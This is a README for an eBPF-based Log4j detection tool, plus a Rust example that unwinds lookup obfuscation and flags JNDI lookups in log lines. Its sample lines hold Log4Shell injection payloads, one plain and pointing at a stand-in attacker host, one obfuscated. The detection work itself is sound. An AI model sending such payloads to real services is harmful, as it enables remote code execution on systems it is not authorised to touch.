An eBPF-based Log4j observability tool used to detect and prevent malicious JNDI (LDAP) lookups. Currently tested in a controlled environment only.
- Developed with aya (https://github.com/aya-rs/aya), a Rust eBPF library.
- Use in tandem with https://github.com/christophetd/log4shell-vulnerable-app as the baseline target application.
Prerequisites:
- Rust stable and nightly toolchains (nightly with rust-src is needed to build the eBPF side):
    rustup install stable
    rustup toolchain install nightly --component rust-src
- bpf-linker:
    cargo install bpf-linker
- Ref: https://aya-rs.dev/book/start/development/#how-to-use-this-guide

Build (userspace binary, then the eBPF program):
    cargo build
    cargo xtask build-ebpf

Rule set:
- Default config: draft-rule-set-default.yml
- Inspect the draft rule set with:
    cat logger-info/src/draft-rule-set-v1.yml

Run (add RUST_LOG=info to see the tool's log output):
    cargo xtask run
    RUST_LOG=info cargo xtask run
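The detection the tool performs on JNDI lookups, shown here as an added, stand-alone userspace example (not the project's eBPF program or its YAML rule engine, whose format is not shown above). It assumes a few constructed request-log lines and first unwinds the common Log4j lookup obfuscations (`${lower:...}`, `${upper:...}`, `${...:-default}`) before flagging the `${jndi:...}` scheme, which a naive substring match would miss:

```rust
// Added example: normalize Log4j-style lookup obfuscation, then flag JNDI lookups.
// Sample lines below are constructed, not captured traffic.
const JNDI_SCHEMES: &[&str] = &["ldap:", "ldaps:", "rmi:", "dns:", "iiop:", "nis:", "corba:"];

/// Resolve one innermost `${...}` that only rewrites text; `${jndi:...}` is left alone.
fn resolve_one(s: &str) -> Option<String> {
    for (start, _) in s.rmatch_indices("${") {
        let end = match s[start..].find('}') { Some(o) => start + o, None => continue };
        let inner = &s[start + 2..end];
        if inner.contains("${") || inner.to_ascii_lowercase().starts_with("jndi:") {
            continue; // not innermost, or the lookup we want to keep and detect
        }
        let replacement = if let Some(rest) = inner.strip_prefix("lower:") {
            rest.to_lowercase()
        } else if let Some(rest) = inner.strip_prefix("upper:") {
            rest.to_uppercase()
        } else if let Some(pos) = inner.find(":-") {
            inner[pos + 2..].to_string() // default-value form, e.g. `${env:X:-j}` or `${::-j}`
        } else {
            continue; // some other lookup; leave it as-is
        };
        return Some(format!("{}{}{}", &s[..start], replacement, &s[end + 1..]));
    }
    None
}

/// Repeatedly unwind obfuscation (bounded), then lowercase for matching.
fn normalize(s: &str) -> String {
    let mut cur = s.to_string();
    for _ in 0..32 {
        match resolve_one(&cur) { Some(next) => cur = next, None => break }
    }
    cur.to_lowercase()
}

/// Returns the JNDI scheme ("ldap:", "rmi:", ... or "other") when the line carries a JNDI lookup.
fn detect_jndi(line: &str) -> Option<&'static str> {
    let n = normalize(line);
    let after = &n[n.find("${jndi:")? + 7..];
    Some(JNDI_SCHEMES.iter().copied().find(|sch| after.starts_with(sch)).unwrap_or("other"))
}

fn main() {
    let samples = [
        "GET /index.html HTTP/1.1 User-Agent: curl/8.0",
        "GET / HTTP/1.1 X-Api-Version: ${jndi:ldap://attacker.example/a}",
        "GET / HTTP/1.1 User-Agent: ${${lower:j}ndi:${lower:rmi}://x.example/y}",
    ];
    for line in samples {
        match detect_jndi(line) {
            Some(scheme) => println!("ALERT scheme={scheme} line={line}"),
            None => println!("ok    line={line}"),
        }
    }
}
```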